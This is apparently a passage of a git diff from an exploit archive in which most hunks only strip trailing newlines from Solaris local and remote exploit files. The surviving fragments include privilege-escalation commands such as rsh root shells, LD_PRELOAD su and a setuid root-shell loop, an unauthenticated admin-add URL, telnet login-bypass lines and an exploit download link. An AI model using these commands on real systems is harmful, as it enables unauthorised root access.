a/platforms/solaris/local/20743.c b/platforms/solaris/local/20743.c index ad48a17b3..1ddc20b58 100755 --- a/platforms/solaris/local/20743.c +++ b/platforms/solaris/local/20743.c @@ -60,4 +60,4 @@ int main (int argc, char *argv[]) putenv(buf); execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL); return; -} +} \ No newline at end of file diff --git a/platforms/solaris/local/20767.c b/platforms/solaris/local/20767.c index 6fff819a6..41322a8a7 100755 --- a/platforms/solaris/local/20767.c +++ b/platforms/solaris/local/20767.c @@ -71,5 +71,4 @@ main(int argc,char **argv){ *b=0; execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20768.c b/platforms/solaris/local/20768.c index 79e2548b0..3fc1cfe0a 100755 --- a/platforms/solaris/local/20768.c +++ b/platforms/solaris/local/20768.c @@ -84,5 +84,4 @@ main(int argc,char **argv){ *b=0; execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20772.c b/platforms/solaris/local/20772.c index 9bd70bfae..713a0a495 100755 --- a/platforms/solaris/local/20772.c +++ b/platforms/solaris/local/20772.c @@ -71,5 +71,4 @@ char shell[]= memcpy(buf+1116,&magic,4); buf[1149]=0; execl("/usr/bin/mailx","mailx","-F",buf,NULL); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20773.c b/platforms/solaris/local/20773.c index e7ac824f0..c3295c2a2 100755 --- a/platforms/solaris/local/20773.c +++ b/platforms/solaris/local/20773.c @@ -87,4 +87,4 @@ char shell[]= buf[1220]=0; execl("/usr/bin/mailx","mailx","-F",buf,NULL); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/20885.c b/platforms/solaris/local/20885.c index 7c445f693..f866b38e5 100755 --- a/platforms/solaris/local/20885.c +++ b/platforms/solaris/local/20885.c @@ -110,7 +110,4 @@ int main(int argc, char *argv[]) ex[0] = "/usr/openwin/bin/mailtool"; ex[1] = NULL; execv(ex[0], ex); -} - - - +} \ No newline at end of file diff --git a/platforms/solaris/local/20969.c b/platforms/solaris/local/20969.c index 417a27668..5abdb7423 100755 --- a/platforms/solaris/local/20969.c +++ b/platforms/solaris/local/20969.c @@ -85,6 +85,4 @@ ldap[strlen(ldap) - 3] = 0x00; //ldap[3998] has to be NULL terminated execle(target[atoi(argv[1])].path, "12341234", (char *)0, envs); -} - - +} \ No newline at end of file diff --git a/platforms/solaris/local/20970.c b/platforms/solaris/local/20970.c index 8779966ad..41e119d0a 100755 --- a/platforms/solaris/local/20970.c +++ b/platforms/solaris/local/20970.c @@ -114,4 +114,4 @@ int main(int argc, char **argv) { addr, bufsize, soff, get_sp()); execl("/bin/passwd","lameswd",0); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/20974.c b/platforms/solaris/local/20974.c index 92cc77e01..ce06bfd52 100755 --- a/platforms/solaris/local/20974.c +++ b/platforms/solaris/local/20974.c @@ -50,4 +50,4 @@ char shell[]= putenv(buf); system("/usr/sbin/i86/whodo"); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/210.c b/platforms/solaris/local/210.c index ba2f92d73..3678b0f62 100755 --- a/platforms/solaris/local/210.c +++ b/platforms/solaris/local/210.c @@ -283,4 +283,4 @@ main( int argc, char **argv ) } -// milw0rm.com [2000-11-30] +// milw0rm.com [2000-11-30] \ No newline at end of file diff --git a/platforms/solaris/local/21360.c b/platforms/solaris/local/21360.c index 1c16f4e29..e675b137a 100755 --- a/platforms/solaris/local/21360.c +++ b/platforms/solaris/local/21360.c @@ -180,5 +180,4 @@ code)); return 0; } -/* [eof] */ - +/* [eof] */ \ No newline at end of file diff --git a/platforms/solaris/local/22120.c b/platforms/solaris/local/22120.c index 04f2e6c75..9d3666136 100755 --- a/platforms/solaris/local/22120.c +++ b/platforms/solaris/local/22120.c @@ -36,4 +36,4 @@ int main(int argc, char **argv) printf ("<Done>\n"); system ("/usr/sbin/wall < /tmp/rxax"); unlink ("/tmp/rxax"); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/2241.c b/platforms/solaris/local/2241.c index bbc7614d4..3f8565f66 100755 --- a/platforms/solaris/local/2241.c +++ b/platforms/solaris/local/2241.c @@ -98,4 +98,4 @@ int main(int argc, char **argv) exit(0); } -// milw0rm.com [2006-08-22] +// milw0rm.com [2006-08-22] \ No newline at end of file diff --git a/platforms/solaris/local/2242.sh b/platforms/solaris/local/2242.sh index 316d23eb2..bf6f1ca42 100755 --- a/platforms/solaris/local/2242.sh +++ b/platforms/solaris/local/2242.sh @@ -32,4 +32,4 @@ echo /usr/ucb/ps -auxgeww -# milw0rm.com [2006-08-22] +# milw0rm.com [2006-08-22] \ No newline at end of file diff --git a/platforms/solaris/local/2330.c b/platforms/solaris/local/2330.c index ab0561d61..31800ea91 100755 --- a/platforms/solaris/local/2330.c +++ b/platforms/solaris/local/2330.c @@ -194,4 +194,4 @@ int main(int argc,char **argv){ exit(EXIT_FAILURE); } -// milw0rm.com [2006-09-08] +// milw0rm.com [2006-09-08] \ No newline at end of file diff --git a/platforms/solaris/local/2331.c b/platforms/solaris/local/2331.c index ee5c2311d..5e2075268 100755 --- a/platforms/solaris/local/2331.c +++ b/platforms/solaris/local/2331.c @@ -89,4 +89,4 @@ int main(int argc,char **argv){ exit(EXIT_FAILURE); } -// milw0rm.com [2006-09-08] +// milw0rm.com [2006-09-08] \ No newline at end of file diff --git a/platforms/solaris/local/2360.c b/platforms/solaris/local/2360.c index 5214a53d1..44ac79f0d 100755 --- a/platforms/solaris/local/2360.c +++ b/platforms/solaris/local/2360.c @@ -326,4 +326,4 @@ void set_val(char *buf, int pos, int val) buf[pos + 3] = (val & 0x000000ff); } -// milw0rm.com [2006-09-13] +// milw0rm.com [2006-09-13] \ No newline at end of file diff --git a/platforms/solaris/local/247.c b/platforms/solaris/local/247.c index 55fa87923..58b8be08a 100755 --- a/platforms/solaris/local/247.c +++ b/platforms/solaris/local/247.c @@ -43,4 +43,4 @@ void main() } -// milw0rm.com [2001-01-13] +// milw0rm.com [2001-01-13] \ No newline at end of file diff --git a/platforms/solaris/local/250.c b/platforms/solaris/local/250.c index d0c8f968a..2865f059c 100755 --- a/platforms/solaris/local/250.c +++ b/platforms/solaris/local/250.c @@ -52,4 +52,4 @@ int main(int ac, char **av) } -// milw0rm.com [2001-01-15] +// milw0rm.com [2001-01-15] \ No newline at end of file diff --git a/platforms/solaris/local/2543.sh b/platforms/solaris/local/2543.sh index 5af7a4d8d..ee612c349 100755 --- a/platforms/solaris/local/2543.sh +++ b/platforms/solaris/local/2543.sh @@ -60,4 +60,4 @@ umask 0 echo "+ +" > $NSPR_LOG_FILE rsh -l root localhost sh -i -# milw0rm.com [2006-10-13] +# milw0rm.com [2006-10-13] \ No newline at end of file diff --git a/platforms/solaris/local/256.c b/platforms/solaris/local/256.c index bd1c439a5..e166fffd7 100755 --- a/platforms/solaris/local/256.c +++ b/platforms/solaris/local/256.c @@ -64,4 +64,4 @@ void main(int argc,char **argv) } -// milw0rm.com [2001-01-25] +// milw0rm.com [2001-01-25] \ No newline at end of file diff --git a/platforms/solaris/local/2569.sh b/platforms/solaris/local/2569.sh index a110b8664..de30602d3 100755 --- a/platforms/solaris/local/2569.sh +++ b/platforms/solaris/local/2569.sh @@ -75,4 +75,4 @@ fi unset NSPR_LOG_MODULES NSPR_LOG_FILE LD_PRELOAD=/usr/lib/secure/getuid.so su - -# milw0rm.com [2006-10-16] +# milw0rm.com [2006-10-16] \ No newline at end of file diff --git a/platforms/solaris/local/25896.pl b/platforms/solaris/local/25896.pl index b158b502b..af7c60360 100755 --- a/platforms/solaris/local/25896.pl +++ b/platforms/solaris/local/25896.pl @@ -23,4 +23,4 @@ $cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 print $cmd, "\n"; -system($cmd); +system($cmd); \ No newline at end of file diff --git a/platforms/solaris/local/2641.sh b/platforms/solaris/local/2641.sh index 2b4ddc744..62548cb23 100755 --- a/platforms/solaris/local/2641.sh +++ b/platforms/solaris/local/2641.sh @@ -82,4 +82,4 @@ fi unset NSPR_LOG_MODULES NSPR_LOG_FILE LD_LIBRARY_PATH=/usr/lib/secure su - -# milw0rm.com [2006-10-24] +# milw0rm.com [2006-10-24] \ No newline at end of file diff --git a/platforms/solaris/local/28788.sh b/platforms/solaris/local/28788.sh index 62bcaee01..66f06d697 100755 --- a/platforms/solaris/local/28788.sh +++ b/platforms/solaris/local/28788.sh @@ -66,5 +66,4 @@ umask 0 # oldschool rhosts foo;) echo "+ +" > $NSPR_LOG_FILE -rsh -l root localhost sh -i - +rsh -l root localhost sh -i \ No newline at end of file diff --git a/platforms/solaris/local/28789.sh b/platforms/solaris/local/28789.sh index df639622f..31464f786 100755 --- a/platforms/solaris/local/28789.sh +++ b/platforms/solaris/local/28789.sh @@ -88,5 +88,4 @@ fi # newschool LD_LIBRARY_PATH foo;) unset NSPR_LOG_MODULES NSPR_LOG_FILE -LD_LIBRARY_PATH=/usr/lib/secure su - - +LD_LIBRARY_PATH=/usr/lib/secure su - \ No newline at end of file diff --git a/platforms/solaris/local/328.c b/platforms/solaris/local/328.c index 455ff324c..84905a9d5 100755 --- a/platforms/solaris/local/328.c +++ b/platforms/solaris/local/328.c @@ -123,4 +123,4 @@ Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on --------------------------- end of lion25.c ------------------------------- -// milw0rm.com [1997-03-23] +// milw0rm.com [1997-03-23] \ No newline at end of file diff --git a/platforms/solaris/local/330.sh b/platforms/solaris/local/330.sh index 89874860d..8e2b327b7 100755 --- a/platforms/solaris/local/330.sh +++ b/platforms/solaris/local/330.sh @@ -148,4 +148,4 @@ rsh -l root localhost /bin/sh -i # # -# milw0rm.com [1997-05-03] +# milw0rm.com [1997-05-03] \ No newline at end of file diff --git a/platforms/solaris/local/332.sh b/platforms/solaris/local/332.sh index 9d1ca5ea4..f9db15eb5 100755 --- a/platforms/solaris/local/332.sh +++ b/platforms/solaris/local/332.sh @@ -83,4 +83,4 @@ $CC -o ps_expl ps_expl.c # And off we go! exec ./ps_expl -// milw0rm.com [1997-05-19] +// milw0rm.com [1997-05-19] \ No newline at end of file diff --git a/platforms/solaris/local/33799.sh b/platforms/solaris/local/33799.sh index 8aee19a59..00730d717 100755 --- a/platforms/solaris/local/33799.sh +++ b/platforms/solaris/local/33799.sh @@ -50,4 +50,4 @@ echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh chmod +x /tmp/diskette_rc.d/rcs9.sh echo "[+] Waiting for root shell" -until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t +until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t \ No newline at end of file diff --git a/platforms/solaris/local/338.c b/platforms/solaris/local/338.c index eebb8d91f..1d9abd692 100755 --- a/platforms/solaris/local/338.c +++ b/platforms/solaris/local/338.c @@ -80,4 +80,4 @@ void main(int argc, char *argv[]) perror("execl failed"); } -// milw0rm.com [1997-05-28] +// milw0rm.com [1997-05-28] \ No newline at end of file diff --git a/platforms/solaris/local/4.c b/platforms/solaris/local/4.c index 659e2207f..caa739eb2 100755 --- a/platforms/solaris/local/4.c +++ b/platforms/solaris/local/4.c @@ -121,4 +121,4 @@ execl("/usr/sbin/ping", "ping", buf, NULL); } -// milw0rm.com [2003-04-01] +// milw0rm.com [2003-04-01] \ No newline at end of file diff --git a/platforms/solaris/local/41871.sh b/platforms/solaris/local/41871.sh index 51d8eb9e2..14001564a 100755 --- a/platforms/solaris/local/41871.sh +++ b/platforms/solaris/local/41871.sh @@ -47,4 +47,4 @@ DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather ls -al /usr/lib/locale | grep pdkhax rm -rf /var/dt/appconfig/appmanager chmod 755 /usr/lib/locale/pdkhax -echo [-] Done. "/usr/lib/locale/pdkhax" is writeable +echo [-] Done. "/usr/lib/locale/pdkhax" is writeable \ No newline at end of file diff --git a/platforms/solaris/local/4515.c b/platforms/solaris/local/4515.c index 669293853..815cd2f63 100755 --- a/platforms/solaris/local/4515.c +++ b/platforms/solaris/local/4515.c @@ -58,4 +58,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2007-09-01] +// milw0rm.com [2007-09-01] \ No newline at end of file diff --git a/platforms/solaris/local/4516.c b/platforms/solaris/local/4516.c index 5a396c244..785e85139 100755 --- a/platforms/solaris/local/4516.c +++ b/platforms/solaris/local/4516.c @@ -102,4 +102,4 @@ cleanup: return 0; } -// milw0rm.com [2007-10-10] +// milw0rm.com [2007-10-10] \ No newline at end of file diff --git a/platforms/solaris/local/5227.c b/platforms/solaris/local/5227.c index cdb36311b..b5ed578dd 100755 --- a/platforms/solaris/local/5227.c +++ b/platforms/solaris/local/5227.c @@ -143,4 +143,4 @@ int main(int argc, char **argv) exit(0); } -// milw0rm.com [2008-03-10] +// milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/solaris/local/713.c b/platforms/solaris/local/713.c index 3e9e3e7e5..576f74feb 100755 --- a/platforms/solaris/local/713.c +++ b/platforms/solaris/local/713.c @@ -188,4 +188,4 @@ buf[pos + 2] = (val & 0x0000ff00) >> 8; buf[pos + 3] = (val & 0x000000ff); } -// milw0rm.com [2004-12-24] +// milw0rm.com [2004-12-24] \ No newline at end of file diff --git a/platforms/solaris/local/714.c b/platforms/solaris/local/714.c index 905e244b6..6646752d2 100755 --- a/platforms/solaris/local/714.c +++ b/platforms/solaris/local/714.c @@ -328,4 +328,4 @@ buf[pos + 2] = (val & 0x0000ff00) >> 8; buf[pos + 3] = (val & 0x000000ff); } -// milw0rm.com [2004-12-24] +// milw0rm.com [2004-12-24] \ No newline at end of file diff --git a/platforms/solaris/local/715.c b/platforms/solaris/local/715.c index d293cab0e..820da9d27 100755 --- a/platforms/solaris/local/715.c +++ b/platforms/solaris/local/715.c @@ -569,4 +569,4 @@ int read_prompt(int fd, char *buf, int size) return n; } -// milw0rm.com [2004-12-24] +// milw0rm.com [2004-12-24] \ No newline at end of file diff --git a/platforms/solaris/local/972.c b/platforms/solaris/local/972.c index be75367d8..e0c117268 100755 --- a/platforms/solaris/local/972.c +++ b/platforms/solaris/local/972.c @@ -224,4 +224,4 @@ int usage(char *p) return 0; } -// milw0rm.com [2005-04-30] +// milw0rm.com [2005-04-30] \ No newline at end of file diff --git a/platforms/solaris/remote/10036.rb b/platforms/solaris/remote/10036.rb index 99fb6ef46..2f25e08ec 100755 --- a/platforms/solaris/remote/10036.rb +++ b/platforms/solaris/remote/10036.rb @@ -220,4 +220,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_dialup end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/101.pl b/platforms/solaris/remote/101.pl index 5aee6a47a..22e3876f5 100755 --- a/platforms/solaris/remote/101.pl +++ b/platforms/solaris/remote/101.pl @@ -426,4 +426,4 @@ sub rpc_sadmin_exec { -# milw0rm.com [2003-09-19] +# milw0rm.com [2003-09-19] \ No newline at end of file diff --git a/platforms/solaris/remote/1167.pm b/platforms/solaris/remote/1167.pm index fe49c62bb..7fd2ac5d3 100755 --- a/platforms/solaris/remote/1167.pm +++ b/platforms/solaris/remote/1167.pm @@ -140,4 +140,4 @@ sub SendFile { 1; -# milw0rm.com [2005-08-19] +# milw0rm.com [2005-08-19] \ No newline at end of file diff --git a/platforms/solaris/remote/16322.rb b/platforms/solaris/remote/16322.rb index 397073f6a..c55ba500e 100755 --- a/platforms/solaris/remote/16322.rb +++ b/platforms/solaris/remote/16322.rb @@ -171,5 +171,4 @@ class Metasploit3 < Msf::Exploit::Remote return true end -end - +end \ No newline at end of file diff --git a/platforms/solaris/remote/16325.rb b/platforms/solaris/remote/16325.rb index 09925370f..cb67b8c16 100755 --- a/platforms/solaris/remote/16325.rb +++ b/platforms/solaris/remote/16325.rb @@ -166,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote XDR.encode(str, 3, 4, int, 0, 0) end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/16326.rb b/platforms/solaris/remote/16326.rb index 4ce405d27..fd6c9adbd 100755 --- a/platforms/solaris/remote/16326.rb +++ b/platforms/solaris/remote/16326.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote print_error('Warning: ' + $!) end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/16327.rb b/platforms/solaris/remote/16327.rb index 9efb319b3..daf5caf97 100755 --- a/platforms/solaris/remote/16327.rb +++ b/platforms/solaris/remote/16327.rb @@ -106,5 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/solaris/remote/16328.rb b/platforms/solaris/remote/16328.rb index 52c75821e..7aeb841de 100755 --- a/platforms/solaris/remote/16328.rb +++ b/platforms/solaris/remote/16328.rb @@ -109,5 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/solaris/remote/16329.rb b/platforms/solaris/remote/16329.rb index 5b01ad4cc..986611217 100755 --- a/platforms/solaris/remote/16329.rb +++ b/platforms/solaris/remote/16329.rb @@ -220,5 +220,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/solaris/remote/19236.txt b/platforms/solaris/remote/19236.txt index ffec881b1..7b20d2f02 100755 --- a/platforms/solaris/remote/19236.txt +++ b/platforms/solaris/remote/19236.txt @@ -39,4 +39,4 @@ $)C SOMETHING -*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. +*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. \ No newline at end of file diff --git a/platforms/solaris/remote/19327.c b/platforms/solaris/remote/19327.c index b77534e60..2f3df285d 100755 --- a/platforms/solaris/remote/19327.c +++ b/platforms/solaris/remote/19327.c @@ -98,5 +98,4 @@ main (int argc, char *argv[]) clnt_destroy(cl); exit (0); -} - +} \ No newline at end of file diff --git a/platforms/solaris/remote/19663.c b/platforms/solaris/remote/19663.c index 2785f3780..b7b46703c 100755 --- a/platforms/solaris/remote/19663.c +++ b/platforms/solaris/remote/19663.c @@ -61,4 +61,4 @@ int main (int argc, char *argv[]) { printf("%s", buffer); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/19668.c b/platforms/solaris/remote/19668.c index b47377aae..fba58baaa 100755 --- a/platforms/solaris/remote/19668.c +++ b/platforms/solaris/remote/19668.c @@ -495,4 +495,4 @@ main(int argc, char *argv[]) clnt_destroy(cl); exit(0); } -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/19669.c b/platforms/solaris/remote/19669.c index ca4f63557..37df9727e 100755 --- a/platforms/solaris/remote/19669.c +++ b/platforms/solaris/remote/19669.c @@ -503,4 +503,4 @@ main(int argc, char *argv[]) clnt_destroy(cl); exit(0); } -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/19670.c b/platforms/solaris/remote/19670.c index 82b6aaefe..6e41092ff 100755 --- a/platforms/solaris/remote/19670.c +++ b/platforms/solaris/remote/19670.c @@ -251,4 +251,4 @@ doesn't exisit, you need the sad arch, try 1 - 4 ... .. .\n", argv } -// EOF +// EOF \ No newline at end of file diff --git a/platforms/solaris/remote/19672.c b/platforms/solaris/remote/19672.c index ac7060ea3..f7f2f192a 100755 --- a/platforms/solaris/remote/19672.c +++ b/platforms/solaris/remote/19672.c @@ -524,5 +524,4 @@ int main(int argc, char *argv[]) execl("telnet", host, "ingreslock"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/solaris/remote/19696.c b/platforms/solaris/remote/19696.c index 0e6dbd861..36b161652 100755 --- a/platforms/solaris/remote/19696.c +++ b/platforms/solaris/remote/19696.c @@ -108,4 +108,4 @@ int aux; free(buf); } - + \ No newline at end of file diff --git a/platforms/solaris/remote/20602.c b/platforms/solaris/remote/20602.c index b3d58c6c5..751cf0a8c 100755 --- a/platforms/solaris/remote/20602.c +++ b/platforms/solaris/remote/20602.c @@ -106,4 +106,4 @@ main(int argc,char **argv){ } } } -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/20648.c b/platforms/solaris/remote/20648.c index cdfd77c2b..14cd5fec9 100755 --- a/platforms/solaris/remote/20648.c +++ b/platforms/solaris/remote/20648.c @@ -215,5 +215,4 @@ main(int argc,char **argv){ } } } -} - +} \ No newline at end of file diff --git a/platforms/solaris/remote/20649.pm b/platforms/solaris/remote/20649.pm index 2c4303507..056b9049c 100755 --- a/platforms/solaris/remote/20649.pm +++ b/platforms/solaris/remote/20649.pm @@ -118,5 +118,4 @@ sub Exploit { $self->PrintLine("[*] Sent!"); return; -} - +} \ No newline at end of file diff --git a/platforms/solaris/remote/20966.c b/platforms/solaris/remote/20966.c index e7ded8d5c..a06ba0ed5 100755 --- a/platforms/solaris/remote/20966.c +++ b/platforms/solaris/remote/20966.c @@ -112,4 +112,4 @@ main (int argc, char *argv[]) } return 0; } -/* www.hack.co.za */ +/* www.hack.co.za */ \ No newline at end of file diff --git a/platforms/solaris/remote/21179.pl b/platforms/solaris/remote/21179.pl index e796a886e..c9e368949 100755 --- a/platforms/solaris/remote/21179.pl +++ b/platforms/solaris/remote/21179.pl @@ -122,4 +122,4 @@ sub getaddr { else { return (gethostbyname($host))[4]; } -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/213.c b/platforms/solaris/remote/213.c index ce29d47df..789a097b9 100755 --- a/platforms/solaris/remote/213.c +++ b/platforms/solaris/remote/213.c @@ -522,4 +522,4 @@ int main(int argc, char *argv[]) } -// milw0rm.com [2000-12-01] +// milw0rm.com [2000-12-01] \ No newline at end of file diff --git a/platforms/solaris/remote/21437.c b/platforms/solaris/remote/21437.c index 49d95d858..3196e3e9b 100755 --- a/platforms/solaris/remote/21437.c +++ b/platforms/solaris/remote/21437.c @@ -224,6 +224,4 @@ main(int argc,char **argv){ } } } -} - - +} \ No newline at end of file diff --git a/platforms/solaris/remote/21677.txt b/platforms/solaris/remote/21677.txt index 07d46f780..35e7a54e0 100755 --- a/platforms/solaris/remote/21677.txt +++ b/platforms/solaris/remote/21677.txt @@ -6,4 +6,4 @@ AnswerBook2 includes an administrative web interface. Reportedly, it is possible http://localhost:8888/ab2/@AdminViewError -http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar +http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar \ No newline at end of file diff --git a/platforms/solaris/remote/21678.c b/platforms/solaris/remote/21678.c index 6527fe445..a4f71b05c 100755 --- a/platforms/solaris/remote/21678.c +++ b/platforms/solaris/remote/21678.c @@ -505,4 +505,4 @@ char* dwhttpd_hstrerror(int err) { } return msg; -} +} \ No newline at end of file diff --git a/platforms/solaris/remote/239.c b/platforms/solaris/remote/239.c index a871aa9c1..457d96c50 100755 --- a/platforms/solaris/remote/239.c +++ b/platforms/solaris/remote/239.c @@ -324,4 +324,4 @@ main(int argc, char **argv) } -// milw0rm.com [2001-01-03] +// milw0rm.com [2001-01-03] \ No newline at end of file diff --git a/platforms/solaris/remote/263.pl b/platforms/solaris/remote/263.pl index 8b3b6df94..16095be04 100755 --- a/platforms/solaris/remote/263.pl +++ b/platforms/solaris/remote/263.pl @@ -65,4 +65,4 @@ print "A"x1200; print ".shtml HTTP/1.0\n\n"; -# milw0rm.com [2001-01-27] +# milw0rm.com [2001-01-27] \ No newline at end of file diff --git a/platforms/solaris/remote/280.c b/platforms/solaris/remote/280.c index 3100cdcb6..e4e45ffc1 100755 --- a/platforms/solaris/remote/280.c +++ b/platforms/solaris/remote/280.c @@ -251,4 +251,4 @@ err: perror("error");exit(-1); } -// milw0rm.com [2001-03-01] +// milw0rm.com [2001-03-01] \ No newline at end of file diff --git a/platforms/solaris/remote/301.c b/platforms/solaris/remote/301.c index 6a21de65b..625a4ef4e 100755 --- a/platforms/solaris/remote/301.c +++ b/platforms/solaris/remote/301.c @@ -789,4 +789,4 @@ close(sockfd); } } -// milw0rm.com [2004-06-25] +// milw0rm.com [2004-06-25] \ No newline at end of file diff --git a/platforms/solaris/remote/32393.txt b/platforms/solaris/remote/32393.txt index 37918e6fb..8c75b975d 100755 --- a/platforms/solaris/remote/32393.txt +++ b/platforms/solaris/remote/32393.txt @@ -14,4 +14,4 @@ $ vi -t file1line1 :q! $ ls file1 gotcha tags -$ +$ \ No newline at end of file diff --git a/platforms/solaris/remote/3293.sh b/platforms/solaris/remote/3293.sh index 2f1cdb879..25394f0ca 100755 --- a/platforms/solaris/remote/3293.sh +++ b/platforms/solaris/remote/3293.sh @@ -18,4 +18,4 @@ echo "ALEX ALEX" echo "" telnet -l"-f$2" $1 -# milw0rm.com [2007-02-11] +# milw0rm.com [2007-02-11] \ No newline at end of file diff --git a/platforms/solaris/remote/5282.txt b/platforms/solaris/remote/5282.txt index e2aa2ae0d..3bdf42f26 100755 --- a/platforms/solaris/remote/5282.txt +++ b/platforms/solaris/remote/5282.txt @@ -2,4 +2,4 @@ Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5282.tar.gz (2008-ypk2008.tar.gz) -# milw0rm.com [2008-03-20] +# milw0rm.com [2008-03-20] \ No newline at end of file diff --git a/platforms/solaris/remote/5366.rb b/platforms/solaris/remote/5366.rb index e8b775936..44172f46e 100755 --- a/platforms/solaris/remote/5366.rb +++ b/platforms/solaris/remote/5366.rb @@ -130,4 +130,4 @@ class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote end end -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/solaris/remote/57.txt b/platforms/solaris/remote/57.txt index 42ec45921..8107f958d 100755 --- a/platforms/solaris/remote/57.txt +++ b/platforms/solaris/remote/57.txt @@ -23,4 +23,4 @@ bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c Last login: whenever $ whoami bin -# milw0rm.com [2002-11-02] +# milw0rm.com [2002-11-02] \ No newline at end of file diff --git a/platforms/solaris/remote/6328.c b/platforms/solaris/remote/6328.c index 0748f646d..703d05a58 100755 --- a/platforms/solaris/remote/6328.c +++ b/platforms/solaris/remote/6328.c @@ -302,4 +302,4 @@ int main(int argc, char **argv) { return 0; } -// milw0rm.com [2008-08-29] +// milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/platforms/solaris/remote/6786.pl b/platforms/solaris/remote/6786.pl index 6b1c02b05..a13d66742 100755 --- a/platforms/solaris/remote/6786.pl +++ b/platforms/solaris/remote/6786.pl @@ -279,4 +279,4 @@ my $r = rpc_read($s); close ($s); } -# milw0rm.com [2008-10-19] +# milw0rm.com [2008-10-19] \ No newline at end of file diff --git a/platforms/solaris/remote/716.c b/platforms/solaris/remote/716.c index 48ed3ac30..65db69fce 100755 --- a/platforms/solaris/remote/716.c +++ b/platforms/solaris/remote/716.c @@ -536,4 +536,4 @@ void usage(char *progname) exit(1); } -// milw0rm.com [2004-12-24] +// milw0rm.com [2004-12-24] \ No newline at end of file diff --git a/platforms/solaris/remote/9917.rb b/platforms/solaris/remote/9917.rb index b6f144006..1e5c22c65 100755 --- a/platforms/solaris/remote/9917.rb +++ b/platforms/solaris/remote/9917.rb @@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/9918.rb b/platforms/solaris/remote/9918.rb index 0c39e3870..23f8608e2 100755 --- a/platforms/solaris/remote/9918.rb +++ b/platforms/solaris/remote/9918.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/9920.rb b/platforms/solaris/remote/9920.rb index f65066b4c..e86ca4b54 100755 --- a/platforms/solaris/remote/9920.rb +++ b/platforms/solaris/remote/9920.rb @@ -166,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote XDR.encode(str, 3, 4, int, 0, 0) end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/9921.rb b/platforms/solaris/remote/9921.rb index 2350ae4ce..8df21efc0 100755 --- a/platforms/solaris/remote/9921.rb +++ b/platforms/solaris/remote/9921.rb @@ -174,4 +174,4 @@ class Metasploit3 < Msf::Exploit::Remote return true end -end +end \ No newline at end of file diff --git a/platforms/solaris/remote/9923.rb b/platforms/solaris/remote/9923.rb index 3997507f3..5e60dee4a 100755 --- a/platforms/solaris/remote/9923.rb +++ b/platforms/solaris/remote/9923.rb @@ -163,4 +163,4 @@ class Metasploit3 < Msf::Exploit::Remote @spc_seq = 0 end -end +end \ No newline at end of file diff --git a/platforms/solaris/shellcode/13733.c b/platforms/solaris/shellcode/13733.c index ee5b9571c..adbfef0cf 100755 --- a/platforms/solaris/shellcode/13733.c +++ b/platforms/solaris/shellcode/13733.c @@ -49,4 +49,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris_sparc/remote/16323.rb b/platforms/solaris_sparc/remote/16323.rb index 9d1c9ac2a..3190d1ab8 100755 --- a/platforms/solaris_sparc/remote/16323.rb +++ b/platforms/solaris_sparc/remote/16323.rb @@ -157,4 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote @spc_seq = 0 end -end +end \ No newline at end of file diff --git a/platforms/solaris_sparc/remote/16330.rb b/platforms/solaris_sparc/remote/16330.rb index acc1c8c91..68fdd720c 100755 --- a/platforms/solaris_sparc/remote/16330.rb +++ b/platforms/solaris_sparc/remote/16330.rb @@ 